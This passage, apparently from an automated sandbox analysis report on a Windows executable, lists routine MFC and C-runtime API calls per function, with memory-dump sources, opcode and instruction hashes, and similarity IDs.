                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                                • String ID: ,B
                                                                                • API String ID: 1823725401-1171447694
                                                                                • Opcode ID: 6e4eebe2f7c47ce69445b25f43a672477e1096752b97ff190f9b27dd38fd8741
                                                                                • Instruction ID: a81a85fb3038a6f2187c3c4b04738b970651fe17f32754a691e671f08d602ce9
                                                                                • Opcode Fuzzy Hash: 6e4eebe2f7c47ce69445b25f43a672477e1096752b97ff190f9b27dd38fd8741
                                                                                • Instruction Fuzzy Hash: 7631247A7242B16E97207FB5BC8483BB6DCEAC63597910A3BF541C3200E7698C40836D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 0042B3BB
                                                                                • GetPropA.USER32 ref: 0042B3D3
                                                                                • CallWindowProcA.USER32 ref: 0042B431
                                                                                  • Part of subcall function 0042AFC3: GetWindowRect.USER32 ref: 0042AFE8
                                                                                  • Part of subcall function 0042AFC3: GetWindow.USER32(?,00000004), ref: 0042B005
                                                                                • SetWindowLongA.USER32(?,000000FC,?), ref: 0042B461
                                                                                • RemovePropA.USER32 ref: 0042B469
                                                                                • GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 0042B470
                                                                                • GlobalDeleteAtom.KERNEL32(00000000), ref: 0042B477
                                                                                  • Part of subcall function 0042AFA0: GetWindowRect.USER32 ref: 0042AFAC
                                                                                • CallWindowProcA.USER32 ref: 0042B4CB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prologLongRemove
                                                                                • String ID: AfxOldWndProc423
                                                                                • API String ID: 2397448395-1060338832
                                                                                • Opcode ID: 35c4507c63b337afb33a6d21b3cd3780cf2fbc0926c33888a38aa1cdaac37185
                                                                                • Instruction ID: 4c58fedbf9d347d8884a3c2b1c7baa330e1f0c086a5c98df8aed871d427c8c8e
                                                                                • Opcode Fuzzy Hash: 35c4507c63b337afb33a6d21b3cd3780cf2fbc0926c33888a38aa1cdaac37185
                                                                                • Instruction Fuzzy Hash: A131A372A0022ABFCF01AFA5ED49EFF7B78EF05311F40411AFA11A1151C7789A10DBA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetWindowRect.USER32 ref: 00401A02
                                                                                • SetWindowLongA.USER32(?,000000FC,?), ref: 00401A1E
                                                                                • RemovePropA.USER32 ref: 00401A3A
                                                                                  • Part of subcall function 00402164: GetMenu.USER32 ref: 0040217C
                                                                                  • Part of subcall function 00402164: GetWindowLongA.USER32 ref: 00402194
                                                                                  • Part of subcall function 00402164: GetWindowRect.USER32 ref: 004021A8
                                                                                  • Part of subcall function 00402164: GetClientRect.USER32 ref: 004021B9
                                                                                  • Part of subcall function 00402164: AdjustWindowRect.USER32(?,?,?), ref: 004021E3
                                                                                  • Part of subcall function 00402164: AdjustWindowRect.USER32(?,?,?), ref: 00402214
                                                                                  • Part of subcall function 00402164: SetWindowLongA.USER32(00000000,000000F0,?), ref: 0040225F
                                                                                • GetClientRect.USER32 ref: 00401AC1
                                                                                • SetPropA.USER32(?,___CResizeCtrl___Class___,FFFFFFFF), ref: 00401AF3
                                                                                • GetWindowLongA.USER32 ref: 00401B02
                                                                                • SetWindowLongA.USER32(?,000000FC,004020F4), ref: 00401B1B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Window$Rect$Long$AdjustClientProp$MenuRemove
                                                                                • String ID: ___CResizeCtrl___Class___
                                                                                • API String ID: 198977373-3260620844
                                                                                • Opcode ID: 6d6511b40c8d61ab5bc81dff66939c815597cb77b0480e161fa684ed8bba3e8e
                                                                                • Instruction ID: 645f68958a581d9b3716c3ba2d15efc11347372831ef04691f65374df07c59ab
                                                                                • Opcode Fuzzy Hash: 6d6511b40c8d61ab5bc81dff66939c815597cb77b0480e161fa684ed8bba3e8e
                                                                                • Instruction Fuzzy Hash: 1C51DBB4A0020A9FCB04DF94D495AAFBB75FB48315F108159EA05AB391C775E981CBA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetStockObject.GDI32(00000011), ref: 0042EE7C
                                                                                • GetStockObject.GDI32(0000000D), ref: 0042EE84
                                                                                • GetObjectA.GDI32(00000000,0000003C,?), ref: 0042EE91
                                                                                • GetDC.USER32(00000000), ref: 0042EEA0
                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0042EEB7
                                                                                • MulDiv.KERNEL32(?,00000048,00000000), ref: 0042EEC3
                                                                                • ReleaseDC.USER32 ref: 0042EECE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Object$Stock$CapsDeviceRelease
                                                                                • String ID: System
                                                                                • API String ID: 46613423-3470857405
                                                                                • Opcode ID: 5ec92b23d7e8824ca08d5c5c64e44d6b9b9ba79e416efc9519c9b9b384639936
                                                                                • Instruction ID: d9e214c30308987c0adf06eeff37de45036da8bccfb3ee18a6df39442fe8ee78
                                                                                • Opcode Fuzzy Hash: 5ec92b23d7e8824ca08d5c5c64e44d6b9b9ba79e416efc9519c9b9b384639936
                                                                                • Instruction Fuzzy Hash: A8118231B00218FBEB109FA1DC45FAE7BB8AF14742F40402AFA05E62D0D774DE418BA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(COMCTL32.DLL,00000800,00000000,00000400,0042D7AB,00000000,00020000,?,?,00000000), ref: 0042D4BA
                                                                                • LoadLibraryA.KERNEL32(COMCTL32.DLL,?,00000000,?,?,?,?,?,?,?,?,0042A795,00000010,00000000), ref: 0042D4C3
                                                                                • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0042D4D7
                                                                                • #17.COMCTL32(?,00000000,?,?,?,?,?,?,?,?,0042A795,00000010,00000000), ref: 0042D4F2
                                                                                • #17.COMCTL32(?,00000000,?,?,?,?,?,?,?,?,0042A795,00000010,00000000), ref: 0042D50E
                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,0042A795,00000010,00000000), ref: 0042D51A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Library$AddressFreeHandleLoadModuleProc
                                                                                • String ID: COMCTL32.DLL$InitCommonControlsEx
                                                                                • API String ID: 1437655972-4218389149
                                                                                • Opcode ID: 4c57caacd1a4191dcef1f12d45bfe221b58bb887195d4d1828467920169ed80c
                                                                                • Instruction ID: 2619aa1cd02ed1f15d6533cdaee9f3b74daa88b6a71469bc9246842ef1531e9e
                                                                                • Opcode Fuzzy Hash: 4c57caacd1a4191dcef1f12d45bfe221b58bb887195d4d1828467920169ed80c
                                                                                • Instruction Fuzzy Hash: B1F0C836B00222AB9B11AF64FD4891B73ACAF8875B7094436F911E3310CB68DD458B7E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • LCMapStringW.KERNEL32(00000000,00000100,0044165C,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00425E2C
                                                                                • LCMapStringA.KERNEL32(00000000,00000100,00441658,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00425E48
                                                                                • LCMapStringA.KERNEL32(?,00000100,00000020,00000001,00000000,00000100,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00425E91
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000101,00000020,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00425EC9
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000020,00000001,00000100,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00425F21
                                                                                • LCMapStringW.KERNEL32(?,00000100,00000100,00000000,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00425F37
                                                                                • LCMapStringW.KERNEL32(?,00000100,00000100,00000000,00000000,00000100,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00425F6A
                                                                                • LCMapStringW.KERNEL32(?,00000100,00000100,00000100,?,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00425FD2
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: String$ByteCharMultiWide
                                                                                • String ID:
                                                                                • API String ID: 352835431-0
                                                                                • Opcode ID: 3ec729428c25ee1921126b9febded8c2e1078534a736e54135598e7527223c13
                                                                                • Instruction ID: fe6be1457a7d6525555466521751adde9880d3bac8cb52d09e47946dc1f2dd7f
                                                                                • Opcode Fuzzy Hash: 3ec729428c25ee1921126b9febded8c2e1078534a736e54135598e7527223c13
                                                                                • Instruction Fuzzy Hash: 0951BC31600629EFCF228F95ED45AEF7FB8FB48750F55012AF804A22A0C3398D51DB68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 0042AA41
                                                                                • FindResourceA.KERNEL32(?,00000000,00000005), ref: 0042AA79
                                                                                • LoadResource.KERNEL32(?,00000000), ref: 0042AA81
                                                                                  • Part of subcall function 0042B7D3: UnhookWindowsHookEx.USER32(?), ref: 0042B7F8
                                                                                • LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0043236C), ref: 0042AA8E
                                                                                • IsWindowEnabled.USER32(?), ref: 0042AAC1
                                                                                • EnableWindow.USER32(?,00000000), ref: 0042AACF
                                                                                • EnableWindow.USER32(?,00000001), ref: 0042AB5D
                                                                                • GetActiveWindow.USER32 ref: 0042AB68
                                                                                • SetActiveWindow.USER32(?), ref: 0042AB76
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Window$Resource$ActiveEnable$EnabledFindH_prologHookLoadLockUnhookWindows
                                                                                • String ID:
                                                                                • API String ID: 401145483-0
                                                                                • Opcode ID: 6febda207dac2bf7676a6e8b77f26d6ef3393098e01b33aeabdeb793bcd9728b
                                                                                • Instruction ID: 90d62c42fc70ef85aed0f5c6b5f325f10032a7001fbb84b5cabffc154c9b2de7
                                                                                • Opcode Fuzzy Hash: 6febda207dac2bf7676a6e8b77f26d6ef3393098e01b33aeabdeb793bcd9728b
                                                                                • Instruction Fuzzy Hash: 1541D630B00625DFCB11AF64ED49A6FBBB5EF44715F50051FF902A2291CB795D40CB9A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(0044E660,?,0042711F), ref: 00427CC6
                                                                                • GlobalDeleteAtom.KERNEL32(00000000), ref: 00427D02
                                                                                • GlobalDeleteAtom.KERNEL32(00000000), ref: 00427D1D
                                                                                • GlobalDeleteAtom.KERNEL32(00000000), ref: 00427D30
                                                                                • GlobalDeleteAtom.KERNEL32(00000000), ref: 00427D43
                                                                                • GlobalDeleteAtom.KERNEL32(00000000), ref: 00427D56
                                                                                • GlobalDeleteAtom.KERNEL32(00000000), ref: 00427D69
                                                                                • GlobalDeleteAtom.KERNEL32(00000000), ref: 00427D7C
                                                                                • LeaveCriticalSection.KERNEL32(0044E660,?,0042711F), ref: 00427D8D
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: AtomDeleteGlobal$CriticalSection$EnterLeave
                                                                                • String ID:
                                                                                • API String ID: 3843206905-0
                                                                                • Opcode ID: 02eb31011d6e035721d6efae2b10f5c3687508b2092d47dacce3a63d6ec09a0b
                                                                                • Instruction ID: c4f65ee0956effee7a96337059cca19181e8fe34763083e12b45b5184bebd8a5
                                                                                • Opcode Fuzzy Hash: 02eb31011d6e035721d6efae2b10f5c3687508b2092d47dacce3a63d6ec09a0b
                                                                                • Instruction Fuzzy Hash: 2B114C5D915A2495EB122FA6FC087A63A74BB2A700FC74433F504476B0D7BC08C6CBAC
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 00424C52
                                                                                • GetStdHandle.KERNEL32(000000F4,004415CC,00000000,?,00000000,?), ref: 00424D28
                                                                                • WriteFile.KERNEL32(00000000), ref: 00424D2F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: File$HandleModuleNameWrite
                                                                                • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                • API String ID: 3784150691-4022980321
                                                                                • Opcode ID: 66660918254b665f4de0be33263410b251e56f032d48690c3f649d2a88b05423
                                                                                • Instruction ID: 651244c1fef6780a1bcb294ae504d03a866881eccbdc5aa50fc901218abfb40d
                                                                                • Opcode Fuzzy Hash: 66660918254b665f4de0be33263410b251e56f032d48690c3f649d2a88b05423
                                                                                • Instruction Fuzzy Hash: 5131F772B002286FDF20EB61EC46FEA776CEB85304F91046BF545D6051DA78EA818B6D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetMenu.USER32 ref: 0040217C
                                                                                • GetWindowLongA.USER32 ref: 00402194
                                                                                • GetWindowRect.USER32 ref: 004021A8
                                                                                • GetClientRect.USER32 ref: 004021B9
                                                                                • AdjustWindowRect.USER32(?,?,?), ref: 004021E3
                                                                                • AdjustWindowRect.USER32(?,?,?), ref: 00402214
                                                                                • SetWindowLongA.USER32(00000000,000000F0,?), ref: 0040225F
                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000014), ref: 0040228A
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Window$Rect$AdjustLong$ClientMenu
                                                                                • String ID:
                                                                                • API String ID: 981960374-0
                                                                                • Opcode ID: 7cd1ce2caa51248533568c893ca135ea21172535c4a2949eafc55bd5e98fe749
                                                                                • Instruction ID: 59eb8c588deaa5d71ba3fbc6da4ed1fbf1d28a55154e919e37b4c854eac08df1
                                                                                • Opcode Fuzzy Hash: 7cd1ce2caa51248533568c893ca135ea21172535c4a2949eafc55bd5e98fe749
                                                                                • Instruction Fuzzy Hash: E4417375E01109AFCB08DFE8E994DEEBBB5BF48301F108229F915A7394DA34AA45CF54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GlobalLock.KERNEL32 ref: 0042E0E8
                                                                                • lstrcmpA.KERNEL32(?,?), ref: 0042E0F4
                                                                                • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 0042E106
                                                                                • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 0042E129
                                                                                • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 0042E131
                                                                                • GlobalLock.KERNEL32 ref: 0042E13E
                                                                                • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 0042E14B
                                                                                • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 0042E169
                                                                                  • Part of subcall function 0042FF41: GlobalFlags.KERNEL32(?), ref: 0042FF4B
                                                                                  • Part of subcall function 0042FF41: GlobalUnlock.KERNEL32(?,?,?,00430BEC,?,?,?,?,004128BF,0044BEB8,?,0040345E), ref: 0042FF62
                                                                                  • Part of subcall function 0042FF41: GlobalFree.KERNEL32 ref: 0042FF6D
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                                • String ID:
                                                                                • API String ID: 168474834-0
                                                                                • Opcode ID: c2baaa59f3228edbd8e4f4c42fbf9dae71efe466d58ef4fb555d060112591abb
                                                                                • Instruction ID: 47f989acda206917db9905037332a58bb28c8949d2979b352a9a0551fb8e54d1
                                                                                • Opcode Fuzzy Hash: c2baaa59f3228edbd8e4f4c42fbf9dae71efe466d58ef4fb555d060112591abb
                                                                                • Instruction Fuzzy Hash: E9119471600114BAEB219F77EC45E7F7ABDEF85744F80446EF604E2111D639DE109B24
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetStartupInfoA.KERNEL32(?), ref: 0042492F
                                                                                • GetFileType.KERNEL32(?,?,00000000), ref: 004249DA
                                                                                • GetStdHandle.KERNEL32(-000000F6,?,00000000), ref: 00424A3D
                                                                                • GetFileType.KERNEL32(00000000,?,00000000), ref: 00424A4B
                                                                                • SetHandleCount.KERNEL32 ref: 00424A82
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: FileHandleType$CountInfoStartup
                                                                                • String ID: $D
                                                                                • API String ID: 1710529072-2460468198
                                                                                • Opcode ID: fdd5eec0aa30cfb39ede51537b1476356e4a174ebf30ffc324b8e1d0789f5890
                                                                                • Instruction ID: 101a517258b3af37a39cee39fefedc3ff0a5a98df4df23431c8e9c75c210f023
                                                                                • Opcode Fuzzy Hash: fdd5eec0aa30cfb39ede51537b1476356e4a174ebf30ffc324b8e1d0789f5890
                                                                                • Instruction Fuzzy Hash: 795125717002218FC721CF38E84476ABBE0FB86328FA5466ED5929B2E2D7389945C74D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetPropA.USER32 ref: 00429DF3
                                                                                • CallWindowProcA.USER32 ref: 00429E15
                                                                                  • Part of subcall function 00426C80: CallWindowProcA.USER32 ref: 00426CA6
                                                                                  • Part of subcall function 00426C80: RemovePropA.USER32 ref: 00426CBE
                                                                                  • Part of subcall function 00426C80: RemovePropA.USER32 ref: 00426CCA
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Prop$CallProcRemoveWindow
                                                                                • String ID:
                                                                                • API String ID: 2276450057-0
                                                                                • Opcode ID: 81e63247b3dd26a248537978a99b11017d76f1e947f2153f078f5a9bf8d5de7c
                                                                                • Instruction ID: 90c8a0778587e0954a9aa73d4846818c464f83a84ba38a3a3b9ddbdb0dd917e3
                                                                                • Opcode Fuzzy Hash: 81e63247b3dd26a248537978a99b11017d76f1e947f2153f078f5a9bf8d5de7c
                                                                                • Instruction Fuzzy Hash: FB3114767002206FD20097A9BC85DAFB79CEF95362F45042AFE0587241D7395D0AC6BA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetParent.USER32(?), ref: 0042D31A
                                                                                • PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 0042D343
                                                                                • UpdateWindow.USER32(?), ref: 0042D35F
                                                                                • SendMessageA.USER32 ref: 0042D385
                                                                                • SendMessageA.USER32 ref: 0042D3A4
                                                                                • UpdateWindow.USER32(?), ref: 0042D3E7
                                                                                • PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 0042D41A
                                                                                  • Part of subcall function 0042D8A8: GetWindowLongA.USER32 ref: 0042D8B4
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
